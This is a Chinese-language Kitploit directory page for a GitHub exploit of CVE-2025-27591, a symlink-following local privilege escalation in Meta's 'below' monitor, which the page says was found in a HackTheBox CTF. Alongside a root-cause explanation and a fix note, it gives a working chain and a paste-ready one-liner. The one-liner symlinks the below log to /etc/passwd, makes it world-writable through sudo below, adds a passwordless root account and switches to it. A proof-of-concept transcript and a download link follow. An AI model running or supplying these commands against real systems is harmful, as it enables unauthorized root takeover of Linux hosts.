Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-27591-Meta-below-LPE — CVE-2025-27591 – 通过符号链接跟随实现本地权限提升(HackTheBox CTF) | Kitploit
工具/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
权限提升漏洞分析漏洞利用横向移动CTF二进制利用
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – 通过符号链接跟随实现本地权限提升(HackTheBox CTF)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
94个月前尚未审核

CVE-2025-27591 — Meta below 符号链接本地权限提升

概述

字段详情
CVECVE-2025-27591
软件Meta below(系统资源监视器)
受影响版本< 0.9.0
漏洞类型符号链接跟随 → 任意文件覆盖为root
身份验证拥有 below 的sudo权限的本地用户
影响本地权限提升至root
背景在HackTheBox CTF中发现

描述

below 系统资源监控工具(由Meta Platforms, Inc.开发)在其错误日志记录机制中存在一个缺陷。当通过 sudo 调用时,它会强制对其位于 /var/log/below/ 的日志文件设置 0666 权限,而不先检查目标路径是否为符号链接。这使得本地攻击者可以将日志文件替换为指向任何root可写文件的符号链接,从而有效地用受控内容覆盖该文件。

技术细节

根本原因

当以root身份运行时,below < 0.9.0 中的日志记录代码按顺序执行以下操作:

  1. 确定日志路径:/var/log/below/error_root.log
  2. 创建或打开文件
  3. 调用 chmod(path, 0o666) — 未检查是否为符号链接
  4. 将错误消息写入该路径

在第4步中,如果在执行前路径已被替换为符号链接,则写入操作将指向符号链接的目标,而非原始路径。

利用链

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

为什么 --time "invalid" 有效

传递一个无效的时间字符串会强制 below 记录错误消息。错误路径到达日志记录代码,该代码盲目地写入文件,而此时文件正是我们设置的符号链接。

使用方法

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

前提条件: 当前用户必须拥有执行 /usr/bin/below 的 sudo 权限。

单行命令

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

概念验证

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

修复

该漏洞已在 below 版本 0.9.0 中修复。修复措施在日志记录路径中的任何文件操作之前引入了符号链接检查。

参考

  • NVD条目
  • Meta below GitHub
下载工具